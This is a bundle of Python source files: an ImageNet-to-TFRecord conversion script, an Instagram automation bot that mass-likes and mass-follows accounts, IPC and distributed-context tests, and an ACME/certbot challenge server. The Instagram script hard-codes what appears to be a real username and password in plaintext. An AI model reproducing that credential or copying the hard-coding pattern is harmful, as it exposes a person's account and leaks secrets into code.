                       tf.gfile.FastGFile(labels_file, 'r').readlines()]

  labels = []
  filenames = []
  synsets = []

  # Leave label index 0 empty as a background class.
  label_index = 1

  # Construct the list of JPEG files and labels.
  for synset in challenge_synsets:
    jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
    matching_files = tf.gfile.Glob(jpeg_file_path)

    # One label per file; every file in this directory shares the synset.
    labels.extend([label_index] * len(matching_files))
    synsets.extend([synset] * len(matching_files))
    filenames.extend(matching_files)

    if not label_index % 100:
      print('Finished finding files in %d of %d classes.' % (
          label_index, len(challenge_synsets)))
    label_index += 1

  # Shuffle the ordering of all image files in order to guarantee
  # random ordering of the images with respect to label in the
  # saved TFRecord files. Make the randomization repeatable.
  shuffled_index = list(range(len(filenames)))
  random.seed(12345)
  random.shuffle(shuffled_index)

  filenames = [filenames[i] for i in shuffled_index]
  synsets = [synsets[i] for i in shuffled_index]
  labels = [labels[i] for i in shuffled_index]

  print('Found %d JPEG files across %d labels inside %s.' %
        (len(filenames), len(challenge_synsets), data_dir))
  return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
                     image_to_bboxes):
    """Process a complete data set and save it as a TFRecord.

    Args:
        name: string, unique identifier specifying the data set.
        directory: string, root path to the data set.
        num_shards: integer number of shards for this data set.
        synset_to_human: dict of synset to human labels, e.g.,
            'n02119022' --> 'red fox, Vulpes vulpes'
        image_to_bboxes: dictionary mapping image file names to a list of
            bounding boxes. This list contains 0+ bounding boxes.
    """
    # Collect the shuffled file list with parallel label/synset lists, then
    # attach human labels and bounding boxes before sharding to TFRecords.
    filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
    humans = _find_human_readable_labels(synsets, synset_to_human)
    bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
    # _process_image_files is defined earlier in this file (outside this view).
    _process_image_files(name, filenames, synsets, labels,
                         humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
    """Build lookup for synset to human-readable label.

    Assumes each line of the file looks like:
        n02119247    black fox
        n02119359    silver fox
        n02119477    red fox, Vulpes fulva
    where each line corresponds to a unique mapping formatted as
    <synset><TAB><human readable label>.

    Args:
        imagenet_metadata_file: string, path to file containing mapping from
            synset to human-readable label.

    Returns:
        Dictionary of synset to human labels, such as:
            'n02119022' --> 'red fox, Vulpes vulpes'
    """
    metadata_lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
    synset_to_human = {}
    for raw_line in metadata_lines:
        # Skip empty entries.
        if not raw_line:
            continue
        fields = raw_line.strip().split('\t')
        assert len(fields) == 2
        synset_to_human[fields[0]] = fields[1]
    return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
    """Build a lookup from image file to bounding boxes.

    Assumes each line of the file looks like:
        n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
    where each line corresponds to one bounding box annotation associated
    with an image. Each line can be parsed as:
        <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
    Note that there might exist multiple bounding box annotations associated
    with an image file. This file is the output of process_bounding_boxes.py.

    Args:
        bounding_box_file: string, path to file with bounding boxes annotations.

    Returns:
        Dictionary mapping image file names to a list of bounding boxes. This
        list contains 0+ bounding boxes, each as [xmin, ymin, xmax, ymax].
    """
    lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
    images_to_bboxes = {}
    num_bbox = 0
    num_image = 0
    for l in lines:
        if l:
            parts = l.split(',')
            assert len(parts) == 5, ('Failed to parse: %s' % l)
            filename = parts[0]
            xmin = float(parts[1])
            ymin = float(parts[2])
            # parts[4] still carries the trailing newline; float() tolerates it.
            xmax = float(parts[3])
            ymax = float(parts[4])
            box = [xmin, ymin, xmax, ymax]
            # First annotation for a file creates its (empty) bbox list.
            if filename not in images_to_bboxes:
                images_to_bboxes[filename] = []
                num_image += 1
            images_to_bboxes[filename].append(box)
            num_bbox += 1
    print('Successfully read %d bounding boxes '
          'across %d images.' % (num_bbox, num_image))
    return images_to_bboxes
def main(unused_argv):
    """Convert the ImageNet train/validation images into sharded TFRecords."""
    # Shard counts must divide evenly across worker threads.
    assert not FLAGS.train_shards % FLAGS.num_threads, (
        'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
    assert not FLAGS.validation_shards % FLAGS.num_threads, (
        'Please make the FLAGS.num_threads commensurate with '
        'FLAGS.validation_shards')
    print('Saving results to %s' % FLAGS.output_directory)
    # Build a map from synset to human-readable label.
    synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
    image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
    # Run it!
    _process_dataset('validation', FLAGS.validation_directory,
                     FLAGS.validation_shards, synset_to_human, image_to_bboxes)
    _process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
                     synset_to_human, image_to_bboxes)


if __name__ == '__main__':
    tf.app.run()
|
like_hashtag.py | # -*- coding: utf-8 -*-
import random
import sys
import sys
sys.path.insert(0, "/home/stefanopoma97/bot//insta-bot1")
from glob import glob
import schedule
from instabot import Bot, utils
import os
import sys
import threading
import time
import config_file
from sys import argv
sys.path.append(os.path.join(sys.path[0], '../../'))
# Construct the instabot client with per-day rate limits, follow filters,
# and per-action delays drawn from config_file.
bot = Bot(comments_file=config_file.COMMENTS_FILE,
          blacklist_file=config_file.BLACKLIST_FILE,
          whitelist_file=config_file.WHITELIST_FILE,
          friends_file=config_file.FRIENDS_FILE,
          followed_file='followed.txt',
          unfollowed_file='unfollowed.txt',
          skipped_file='skipped.txt',
          proxy=None,
          max_likes_per_day=1000,
          max_unlikes_per_day=1000,
          max_follows_per_day=300,
          max_unfollows_per_day=350,
          max_comments_per_day=0,
          max_blocks_per_day=0,
          max_unblocks_per_day=0,
          max_likes_to_like=450,
          max_messages_per_day=0,
          filter_users=True,
          filter_previously_followed=False,
          filter_business_accounts=False,
          filter_verified_accounts=True,
          max_followers_to_follow=3500,
          min_followers_to_follow=40,
          max_following_to_follow=10000,
          min_following_to_follow=10,
          max_followers_to_following_ratio=10,
          max_following_to_followers_ratio=2,
          min_media_count_to_follow=3,
          max_following_to_block=2000,
          like_delay=1,
          unlike_delay=10,
          follow_delay=130,
          unfollow_delay=130,
          comment_delay=60,
          block_delay=30,
          unblock_delay=30,
          message_delay=60,
          stop_words=(),
          verbosity=True,
          )
# NOTE(review): credentials are hard-coded here; move them to config_file or
# environment variables before publishing this script.
bot.login(username="stefano.nature", password="maziamazia97")
bot.logger.info("LIKE SCRIPT")
# Use a context manager so the file handle is closed promptly; the original
# opened the file and never closed it.
with open("hashtag_database.txt", 'r') as f:
    hashtag_file_like_list = [f.read().split('\n')]
# Wrapped text-file helpers supplying random users/hashtags/captions.
random_user_file = utils.file(config_file.USERS_FILE)
random_hashtag_file_like = utils.file(config_file.HASHTAGS_FILE_LIKE)
random_hashtag_file_follow = utils.file(config_file.HASHTAGS_FILE_FOLLOW)
photo_captions_file = utils.file(config_file.PHOTO_CAPTIONS_FILE)
posted_pic_list = utils.file(config_file.POSTED_PICS_FILE).list
# All *.jpg files in the pics directory, by base name, in sorted order.
pics = sorted([os.path.basename(x) for x in
               glob(config_file.PICS_PATH + "/*.jpg")])
def stats():
    """Placeholder for saving account statistics (currently disabled)."""
    print("stats")
    #bot.save_user_stats(bot.user_id)


def like_hashtags():
    """Like up to 50 medias under a random hashtag from the 'like' file."""
    print("like_hashtag")
    bot.like_hashtag(random_hashtag_file_like.random(), amount=50)


def like_timeline():
    """Like up to 20 medias from the bot's own timeline."""
    print("like_timeline")
    bot.like_timeline(amount=20)


def like_user_followers():
    """Like/follow a fixed target account's followers."""
    print("like_user_followers")
    bot.like_followers("sebastianochiari", nlikes=3, nfollows=1)


def like_followers_from_random_user_file():
    """Placeholder: like followers of a random user (currently disabled)."""
    print("like_from_hashtag")
    #bot.like_followers(random_user_file.random(), nlikes=3)


def follow_followers():
    """Placeholder: follow a random user's followers (currently disabled)."""
    print("follow")
    #bot.follow_followers(random_user_file.random(), nfollows=config.NUMBER_OF_FOLLOWERS_TO_FOLLOW)


def comment_medias():
    """Comment on the medias currently in the bot's timeline."""
    bot.comment_medias(bot.get_timeline_medias())


def unfollow_non_followers():
    """Unfollow a configured number of accounts that do not follow back."""
    print("unfollow")
    bot.unfollow_non_followers(n_to_unfollows=config_file.NUMBER_OF_NON_FOLLOWERS_TO_UNFOLLOW)


def unfollow_everyone():
    """Unfollow every account the bot currently follows."""
    print("unfollow_everyone")
    # a = bot.delays
    # valore = a['unfollow']
    # a['unfollow'] = 100
    bot.unfollow_everyone()
    #a['unfollow'] = valore


def follow_users_from_hastag_file():
    """Follow up to 20 users found under a random 'follow' hashtag,
    unless following is currently blocked via config_file.BLOCK."""
    print("follow da file hashtag")
    print(config_file.BLOCK)
    if config_file.BLOCK:
        print("non seguo nessuno")
    else:
        print("inizio a seguire")
        bot.follow_users(bot.get_hashtag_users(random_hashtag_file_follow.random())[:20])


def block_follow():
    """Disable following by raising the config_file.BLOCK flag."""
    print("blocca follow")
    config_file.BLOCK = True
    print(config_file.BLOCK)


def allow_follow():
    """Re-enable following by clearing the config_file.BLOCK flag."""
    print("allow follow")
    config_file.BLOCK = False
    print(config_file.BLOCK)


def comment_hashtag():
    """Comment on medias under a random hashtag from the 'like' file."""
    hashtag = random_hashtag_file_like.random()
    bot.logger.info("Commenting on hashtag: " + hashtag)
    bot.comment_hashtag(hashtag)
def upload_pictures():  # Automatically post a pic in 'pics' folder
    """Upload the first picture in `pics` that has not been posted yet,
    record it in pics.txt, and comment the new post with the hashtags."""
    try:
        for pic in pics:
            if pic in posted_pic_list:
                continue
            caption = photo_captions_file.random()
            full_caption = caption + "\n" + config_file.FOLLOW_MESSAGE
            bot.logger.info("Uploading pic with caption: " + caption)
            # Use os.path.join instead of bare concatenation: the glob above
            # adds "/" itself, so PICS_PATH has no trailing slash and
            # `PICS_PATH + pic` would build a broken path.
            bot.upload_photo(os.path.join(config_file.PICS_PATH, pic),
                             caption=full_caption)
            if bot.api.last_response.status_code != 200:
                bot.logger.error("Something went wrong, read the following ->\n")
                bot.logger.error(bot.api.last_response)
                break
            if pic not in posted_pic_list:
                # After posting a pic, comment it with all the hashtags specified
                # In config.PICS_HASHTAGS
                posted_pic_list.append(pic)
                with open('pics.txt', 'a') as f:
                    f.write(pic + "\n")
                bot.logger.info("Successfully uploaded: " + pic)
                bot.logger.info("Commenting uploaded photo with hashtags...")
                medias = bot.get_your_medias()
                last_photo = medias[0]  # Get the last photo posted
                bot.comment(last_photo, config_file.PICS_HASHTAGS)
                break
    except Exception as e:
        bot.logger.error("Couldn't upload pic")
        bot.logger.error(str(e))
def put_non_followers_on_blacklist():  # put non followers on blacklist
    """Blacklist every account the bot follows that does not follow back
    and is not whitelisted as a friend."""
    try:
        bot.logger.info("Creating non-followers list")
        followings = set(bot.following)
        followers = set(bot.followers)
        friends = bot.friends_file.set  # same whitelist (just user ids)
        # Set difference: followed accounts that neither follow back nor
        # appear in the friends whitelist.
        non_followers = followings - followers - friends
        for user_id in non_followers:
            bot.blacklist_file.append(user_id, allow_duplicates=False)
        bot.logger.info("Done.")
    except Exception as e:
        bot.logger.error("Couldn't update blacklist")
        bot.logger.error(str(e))
def put_following_in_whitelist():  # put all followed accounts on the whitelist
    """Copy every account the bot currently follows into the whitelist file."""
    try:
        bot.logger.info("Creating whitelist")
        followings = set(bot.following)
        for user_id in followings:
            bot.whitelist_file.append(user_id, allow_duplicates=False)
        bot.logger.info("Done.")
    except Exception as e:
        # Fixed copy-pasted message: this function updates the whitelist, and
        # the old "blacklist" text made its failures indistinguishable from
        # put_non_followers_on_blacklist() in the logs.
        bot.logger.error("Couldn't update whitelist")
        bot.logger.error(str(e))
def run_threaded(job_fn):
    """Run job_fn on a new background thread; return immediately without joining."""
    worker = threading.Thread(target=job_fn)
    worker.start()
# Run a single hashtag-like pass; the scheduler loop below is disabled.
like_hashtags()
#while True:
# schedule.run_pending()
# time.sleep(1)
|
test_ipc.py | import abc
import itertools
import multiprocessing
import sys
import textwrap
import time
import traceback
from typing import Any, List, Optional, cast
import pytest
import determined as det
from determined import core, ipc
from tests import parallel
class Subproc(multiprocessing.Process):
    """
    Subproc executes an abstract main(), returning the stacktrace as a string in join().
    """

    def __init__(self, *arg: Any, **kwarg: Any):
        # Queue used to ship the child's formatted traceback back to the parent.
        self._error_queue = multiprocessing.Queue()  # type: Any
        super().__init__(*arg, **kwarg)

    def run(self) -> None:
        # Child-process entry point: run main() and capture any failure as text.
        try:
            self.main()
        except Exception:
            self._error_queue.put(traceback.format_exc())

    def join_and_check(self, *args: Any, **kwargs: Any) -> Optional[str]:
        """Join the process and return the child's traceback string, or None."""
        super().join(*args, **kwargs)
        if not self._error_queue.empty():
            return cast(str, self._error_queue.get())
        return None

    @abc.abstractmethod
    def main(self) -> None:
        # Subclasses implement the child-process body here.
        pass
class SubprocGroup(list):
    """
    SubprocGroup provides a context manager to coordinate opening and closing of many Subprocs.
    """

    def join_all(self) -> None:
        # Every process should be joinable within one second.
        # NOTE(review): join_and_check() is called without a timeout, so the
        # is_alive()/terminate() sweep below can never find a live process —
        # confirm whether a timeout argument was intended here.
        errors = [subproc.join_and_check() for subproc in self]
        # Terminate any processes which did not exit in time.
        num_unterminated = 0
        for subproc in self:
            if subproc.is_alive():
                subproc.terminate()
                subproc.join()
                num_unterminated += 1
        assert num_unterminated == 0
        # Make sure none of the processes raised an error.
        errors = [e for e in errors if e is not None]
        if len(errors):
            # Surface the first child traceback before failing the test.
            print("Traceback from child process:", file=sys.stderr)
            print(textwrap.indent(errors[0], "|"), file=sys.stderr)
            raise AssertionError("failure in child process")

    def __enter__(self) -> "SubprocGroup":
        # Start all subprocesses on entering the context.
        for subproc in self:
            subproc.start()
        return self

    def __exit__(self, *_: Any) -> None:
        self.join_all()
class BroadcastClientSubproc(Subproc):
    """Child process that echoes doubled broadcast messages back to the server."""

    def __init__(
        self, rank: int, size: int, pub_url: str, pull_url: str, exp_msgs: List[int]
    ) -> None:
        self._rank = rank
        self._size = size
        self._pub_url = pub_url
        self._pull_url = pull_url
        # The exact sequence of messages this client expects to receive.
        self._exp_msgs = exp_msgs
        super().__init__()

    def main(self) -> None:
        with ipc.ZMQBroadcastClient(self._pub_url, self._pull_url) as broadcast_client:
            # Start the server-client communication test.
            broadcast_client.safe_start()
            for exp in self._exp_msgs:
                msg = broadcast_client.recv()
                assert msg == exp
                # Reply with 2*msg so the server can verify who received what.
                broadcast_client.send(2 * msg)
def test_broadcast_server_client() -> None:
    """Round-trip test: server broadcasts ints, clients reply with doubles."""
    num_subprocs = 3
    with ipc.ZMQBroadcastServer(num_connections=num_subprocs) as broadcast_server:
        pub_url = f"tcp://localhost:{broadcast_server.get_pub_port()}"
        pull_url = f"tcp://localhost:{broadcast_server.get_pull_port()}"
        msgs = list(range(10))
        with SubprocGroup(
            BroadcastClientSubproc(i, num_subprocs, pub_url, pull_url, msgs)
            for i in range(num_subprocs)
        ):
            broadcast_server.safe_start()
            for msg in msgs:
                broadcast_server.broadcast(msg)
                # Every client must answer with exactly 2*msg.
                gathered = broadcast_server.gather()
                assert all(g == 2 * msg for g in gathered)
@pytest.mark.parametrize("cross_size", [1, 4])
@pytest.mark.parametrize("local_size", [1, 4])
@pytest.mark.parametrize("force_tcp", [False, True])
def test_distributed_context(cross_size: int, local_size: int, force_tcp: bool) -> None:
    """Exercise broadcast/gather/allgather (global and local) on DistributedContext."""
    size = cross_size * local_size
    # Make sure `make test` doesn't hang on macbook's default values. Avoid skipping on linux
    # because it's not a common default, and to avoid false positives in CI.
    if sys.platform == "darwin" and size == 16:
        import resource
        if resource.getrlimit(resource.RLIMIT_NOFILE)[0] < 1024:
            pytest.skip(
                "increase the open fd limit with `ulimit -n 1024` or greater to run this test"
            )
    with parallel.Execution(size, local_size=local_size, make_distributed_context=False) as pex:
        # One DistributedContext per simulated worker, indexed by rank.
        @pex.run
        def contexts() -> core.DistributedContext:
            return core.DistributedContext(
                rank=pex.rank,
                size=pex.size,
                local_rank=pex.local_rank,
                local_size=pex.local_size,
                cross_rank=pex.cross_rank,
                cross_size=pex.cross_size,
                chief_ip="localhost",
                force_tcp=force_tcp,
            )
        # Perform a broadcast.
        results = pex.run(lambda: contexts[pex.rank].broadcast(pex.rank))  # type: ignore
        assert results == [0] * size, "not all threads ran broadcast correctly"
        # Perform a local broadcast.
        results = pex.run(lambda: contexts[pex.rank].broadcast_local(pex.rank))
        expect = [rank - (rank % local_size) for rank in range(size)]  # type: Any
        assert results == expect, "not all threads ran broadcast_local correctly"
        # Perform a gather.
        results = pex.run(lambda: set(contexts[pex.rank].gather(pex.rank) or []))
        chief = set(range(size))
        # NOTE(review): this `expect` is unused; the assertion below compares
        # against [chief] + [set()] * (size - 1) directly.
        expect = [set(range(size)) if rank == 0 else set() for rank in range(size)]
        assert results == [chief] + [set()] * (size - 1), "not all threads ran gather correctly"
        # Perform a local gather.
        results = pex.run(lambda: set(contexts[pex.rank].gather_local(pex.rank) or []))
        expect = [
            set(range(rank, rank + local_size)) if rank % local_size == 0 else set()
            for rank in range(size)
        ]
        assert results == expect, "not all threads ran gather correctly"
        # Perform an allgather.
        results = pex.run(lambda: set(contexts[pex.rank].allgather(pex.rank)))
        expect = set(range(size))
        assert results == [expect] * size, "not all threads ran allgather correctly"
        # Perform a local allgather.
        results = pex.run(lambda: set(contexts[pex.rank].allgather_local(pex.rank)))
        expect = [
            set(range(cross_rank * local_size, (cross_rank + 1) * local_size))
            for cross_rank, _ in itertools.product(range(cross_size), range(local_size))
        ]
        assert results == expect, "not all threads ran allgather_local correctly"
        # Close all contexts.
        for context in contexts:
            context.close()
class TestPIDServer:
    """Tests for the PIDServer/PIDClient worker-liveness protocol."""

    @staticmethod
    def _worker_proc(
        addr: int,
        keep_alive: bool = False,
        sleep_time: float = 10,
        repeat: int = 1,
        crash: bool = False,
    ) -> None:
        # Child-process body: connect a PIDClient, optionally send keep-alives
        # while sleeping, and optionally crash to exercise failure paths.
        with ipc.PIDClient(addr) as pid_client:
            for _ in range(repeat):
                if keep_alive:
                    pid_client.keep_alive()
                time.sleep(sleep_time)
            if crash:
                raise ValueError("Crashing...")

    def test_normal_execution(self) -> None:
        # Two well-behaved workers send keep-alives and shut down gracefully.
        with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
            assert pid_server.listener
            _, port = pid_server.listener.getsockname()
            procs = [
                multiprocessing.Process(
                    target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
                ),
                multiprocessing.Process(
                    target=TestPIDServer._worker_proc, args=(port, True, 0.1, 5)
                ),
            ]
            for p in procs:
                p.start()
            pid_server.run()
            for p in procs:
                p.join()
            assert len(pid_server.graceful_shutdowns) == 2

    def test_worker_crashes(self) -> None:
        # One worker crashes; run() must raise WorkerError promptly.
        with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
            assert pid_server.listener
            _, port = pid_server.listener.getsockname()
            # Enforce that the crashed worker causes the exit before the other worker exits.
            deadline = time.time() + 20
            procs = [
                multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
                multiprocessing.Process(
                    target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
                ),
            ]
            for p in procs:
                p.start()
            with pytest.raises(det.errors.WorkerError):
                pid_server.run()
            assert time.time() < deadline, "crashing worker did not trigger exit"
            for p in procs:
                p.terminate()
                p.join()
            assert len(pid_server.graceful_shutdowns) == 0

    def test_return_code_on_worker_error(self) -> None:
        with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
            assert pid_server.listener
            _, port = pid_server.listener.getsockname()
            # Enforce that the crashed worker causes the exit before the other worker exits.
            deadline = time.time() + 20
            # Enforce that run_subprocess exits nonzero on a worker failure, even if the main
            # subprocess exits zero.
            procs = [
                multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
                multiprocessing.Process(
                    target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
                ),
            ]
            for p in procs:
                p.start()
            error_code = pid_server.run_subprocess(["sleep", "2"])
            # 79 is the sentinel exit code for a worker failure.
            assert error_code == 79
            assert time.time() < deadline, "crashing worker did not trigger exit"
            for p in procs:
                p.terminate()
                p.join()

    def test_health_check_pre_connect(self) -> None:
        # The health check fails before all expected clients have connected.
        with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
            assert pid_server.listener
            _, port = pid_server.listener.getsockname()
            fail_time = time.time() + 0.2

            def health_check() -> None:
                assert time.time() < fail_time

            # Only one worker to guarantee a failed healthcheck before all workers have connected.
            procs = [
                multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
            ]
            for p in procs:
                p.start()
            with pytest.raises(AssertionError):
                pid_server.run(health_check, poll_period=0.05)
            for p in procs:
                p.join()
            assert len(pid_server.graceful_shutdowns) == 0

    def test_health_check_post_connect(self) -> None:
        # The health check fails after both clients have connected.
        with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
            assert pid_server.listener
            _, port = pid_server.listener.getsockname()
            fail_time = time.time() + 0.2

            def health_check() -> None:
                assert time.time() < fail_time

            procs = [
                multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
                multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
            ]
            for p in procs:
                p.start()
            with pytest.raises(AssertionError):
                pid_server.run(health_check, poll_period=0.05)
            for p in procs:
                p.join()
            assert len(pid_server.graceful_shutdowns) == 0

    def test_single_worker_failure_is_caught(self) -> None:
        # This is a regression test; there used to be a codepath where we would stop checking pid's
        # after the last pidclient disconnected, even if it disconnected with a failure.
        with ipc.PIDServer(addr=0, num_clients=1) as pid_server:
            assert pid_server.listener
            _, port = pid_server.listener.getsockname()
            p = multiprocessing.Process(
                target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
            )
            p.start()
            with pytest.raises(det.errors.WorkerError):
                pid_server.run()
            p.terminate()
            p.join()
|
standalone.py | """Support for standalone client challenge solvers. """
import collections
import functools
import http.client as http_client
import http.server as BaseHTTPServer
import logging
import socket
import socketserver
import threading
from typing import Any
from typing import cast
from typing import List
from typing import Mapping
from typing import Optional
from typing import Set
from typing import Tuple
from typing import Type
from OpenSSL import crypto
from OpenSSL import SSL
from acme import challenges
from acme import crypto_util
logger = logging.getLogger(__name__)
class TLSServer(socketserver.TCPServer):
    """Generic TLS Server."""

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        # Pop our custom keywords before delegating to TCPServer.
        self.ipv6 = kwargs.pop("ipv6", False)
        if self.ipv6:
            self.address_family = socket.AF_INET6
        else:
            self.address_family = socket.AF_INET
        # Mapping of SNI server name -> (key, cert) used by _cert_selection.
        self.certs = kwargs.pop("certs", {})
        self.method = kwargs.pop("method", crypto_util._DEFAULT_SSL_METHOD)
        self.allow_reuse_address = kwargs.pop("allow_reuse_address", True)
        super().__init__(*args, **kwargs)

    def _wrap_sock(self) -> None:
        # Replace the listening socket with an SSL-wrapping socket; subclasses
        # may provide _alpn_selection to participate in ALPN negotiation.
        self.socket = cast(socket.socket, crypto_util.SSLSocket(
            self.socket, cert_selection=self._cert_selection,
            alpn_selection=getattr(self, '_alpn_selection', None),
            method=self.method))

    def _cert_selection(self, connection: SSL.Connection
                        ) -> Tuple[crypto.PKey, crypto.X509]:  # pragma: no cover
        """Callback selecting certificate for connection."""
        server_name = connection.get_servername()
        return self.certs.get(server_name, None)

    def server_bind(self) -> None:
        # Wrap with TLS before the actual bind.
        self._wrap_sock()
        return socketserver.TCPServer.server_bind(self)
class ACMEServerMixin:
    """ACME server common settings mixin."""
    # TODO: c.f. #858
    server_version = "ACME client standalone challenge solver"
    # Allow quick restarts on the same port.
    allow_reuse_address = True
class BaseDualNetworkedServers:
    """Base class for a pair of IPv6 and IPv4 servers that tries to do everything
    it's asked for both servers, but where failures in one server don't
    affect the other.

    If two servers are instantiated, they will serve on the same port.
    """

    def __init__(self, ServerClass: Type[socketserver.TCPServer], server_address: Tuple[str, int],
                 *remaining_args: Any, **kwargs: Any) -> None:
        port = server_address[1]
        self.threads: List[threading.Thread] = []
        self.servers: List[socketserver.BaseServer] = []
        # Preserve socket error for re-raising, if no servers can be started
        last_socket_err: Optional[socket.error] = None
        # Must try True first.
        # Ubuntu, for example, will fail to bind to IPv4 if we've already bound
        # to IPv6. But that's ok, since it will accept IPv4 connections on the IPv6
        # socket. On the other hand, FreeBSD will successfully bind to IPv4 on the
        # same port, which means that server will accept the IPv4 connections.
        # If Python is compiled without IPv6, we'll error out but (probably) successfully
        # create the IPv4 server.
        for ip_version in [True, False]:  # True => IPv6 attempt, False => IPv4
            try:
                kwargs["ipv6"] = ip_version
                new_address = (server_address[0],) + (port,) + server_address[2:]
                new_args = (new_address,) + remaining_args
                server = ServerClass(*new_args, **kwargs)
                logger.debug(
                    "Successfully bound to %s:%s using %s", new_address[0],
                    new_address[1], "IPv6" if ip_version else "IPv4")
            except socket.error as e:
                last_socket_err = e
                if self.servers:
                    # Already bound using IPv6.
                    logger.debug(
                        "Certbot wasn't able to bind to %s:%s using %s, this "
                        "is often expected due to the dual stack nature of "
                        "IPv6 socket implementations.",
                        new_address[0], new_address[1],
                        "IPv6" if ip_version else "IPv4")
                else:
                    logger.debug(
                        "Failed to bind to %s:%s using %s", new_address[0],
                        new_address[1], "IPv6" if ip_version else "IPv4")
            else:
                self.servers.append(server)
                # If two servers are set up and port 0 was passed in, ensure we always
                # bind to the same port for both servers.
                port = server.socket.getsockname()[1]
        if not self.servers:
            if last_socket_err:
                raise last_socket_err
            else:  # pragma: no cover
                raise socket.error("Could not bind to IPv4 or IPv6.")

    def serve_forever(self) -> None:
        """Wraps socketserver.TCPServer.serve_forever"""
        # Each server gets its own serving thread.
        for server in self.servers:
            thread = threading.Thread(
                target=server.serve_forever)
            thread.start()
            self.threads.append(thread)

    def getsocknames(self) -> List[Tuple[str, int]]:
        """Wraps socketserver.TCPServer.socket.getsockname"""
        return [server.socket.getsockname() for server in self.servers]

    def shutdown_and_server_close(self) -> None:
        """Wraps socketserver.TCPServer.shutdown, socketserver.TCPServer.server_close, and
        threading.Thread.join"""
        for server in self.servers:
            server.shutdown()
            server.server_close()
        for thread in self.threads:
            thread.join()
        self.threads = []
class TLSALPN01Server(TLSServer, ACMEServerMixin):
    """TLSALPN01 Server."""

    ACME_TLS_1_PROTOCOL = b"acme-tls/1"

    def __init__(self, server_address: Tuple[str, int],
                 certs: List[Tuple[crypto.PKey, crypto.X509]],
                 challenge_certs: Mapping[str, Tuple[crypto.PKey, crypto.X509]],
                 ipv6: bool = False) -> None:
        TLSServer.__init__(
            self, server_address, _BaseRequestHandlerWithLogging, certs=certs,
            ipv6=ipv6)
        # SNI server name -> (key, cert) pairs used for TLS-ALPN-01 validation.
        self.challenge_certs = challenge_certs

    def _cert_selection(self, connection: SSL.Connection) -> Tuple[crypto.PKey, crypto.X509]:
        # TODO: We would like to serve challenge cert only if asked for it via
        # ALPN. To do this, we need to retrieve the list of protos from client
        # hello, but this is currently impossible with openssl [0], and ALPN
        # negotiation is done after cert selection.
        # Therefore, currently we always return challenge cert, and terminate
        # handshake in alpn_selection() if ALPN protos are not what we expect.
        # [0] https://github.com/openssl/openssl/issues/4952
        server_name = connection.get_servername()
        logger.debug("Serving challenge cert for server name %s", server_name)
        return self.challenge_certs[server_name]

    def _alpn_selection(self, _connection: SSL.Connection, alpn_protos: List[bytes]) -> bytes:
        """Callback to select alpn protocol."""
        if len(alpn_protos) == 1 and alpn_protos[0] == self.ACME_TLS_1_PROTOCOL:
            logger.debug("Agreed on %s ALPN", self.ACME_TLS_1_PROTOCOL)
            return self.ACME_TLS_1_PROTOCOL
        logger.debug("Cannot agree on ALPN proto. Got: %s", str(alpn_protos))
        # Explicitly close the connection now, by returning an empty string.
        # See https://www.pyopenssl.org/en/stable/api/ssl.html#OpenSSL.SSL.Context.set_alpn_select_callback # pylint: disable=line-too-long
        return b""
class HTTPServer(BaseHTTPServer.HTTPServer):
    """Generic HTTP Server."""

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        # Pull out our custom keyword before delegating to the stdlib server.
        self.ipv6 = kwargs.pop("ipv6", False)
        self.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
        super().__init__(*args, **kwargs)
class HTTP01Server(HTTPServer, ACMEServerMixin):
    """HTTP01 Server."""

    def __init__(self, server_address: Tuple[str, int], resources: Set[challenges.HTTP01],
                 ipv6: bool = False, timeout: int = 30) -> None:
        # The handler class is pre-bound to the challenge resources and timeout
        # via partial_init, since socketserver instantiates it per request.
        super().__init__(
            server_address, HTTP01RequestHandler.partial_init(
                simple_http_resources=resources, timeout=timeout), ipv6=ipv6)
